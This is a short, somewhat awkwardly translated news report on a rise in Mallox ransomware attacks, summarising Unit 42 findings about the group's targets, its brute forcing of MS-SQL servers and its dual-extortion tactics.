Mallox Ransomware Attacks More Often – Up 174% Over the Last Year

Mallox ransomware activity has increased significantly in 2023, up 174% year-over-year, according to new data obtained by experts Unit 42 from Palo Alto Networks.

“Mallox, like many other ransomware groups, has a dual extortion strategy: first they steal data, then they encrypt files in the victim’s organization and threaten to release the stolen information in order to force them to pay a ransom,” reads the statement. recent report cybersecurity experts Lior Rohberger and Shimi Cohen.

According to researchers, Mallox ransomware is closely related to other attackers such as TargetCompany, Tohnichi, Fargo, and the recently emerged Xollam. The Mallox group itself was spotted in June 2021. Among the main targets of hackers are manufacturing companies, professional services firms and wholesale and retail trade.

A distinctive feature of these extortionate formations is the hacking of poorly protected MS-SQL servers using password brute force, which allows them to penetrate the networks of their victims. Xollam, on the other hand, is different in that it uses malicious OneNote attachments for initial access.

After successful penetration, PowerShell– command to download ransomware from a remote server. The program itself attempts to stop SQL services, delete volume shadow copies, clear system event logs, interrupt security-related processes, and bypass Raccine, an anti-ransomware tool. After that, encryption starts, and a ransom note file is left in each directory.

Experts attribute the increase in ransomware activity to the fact that it still brings huge profits to cybercriminals – in the first six months of 2023 alone, ransomware managed to get at least $449.1 million, according to Chainalysis.

The sharp increase in the number of Mallox attacks is only part of a general trend: the number of ransomware attacks increased by 221% over the year, and 434 incidents were recorded in June 2023 alone. One of the main reasons for such sad statistics is exploitation by hackers Clop vulnerabilities MOVEit Transfer.

“In recent months, the Mallox group has become more active, and their recruitment attempts could lead to attacks on even more organizations,” experts warn.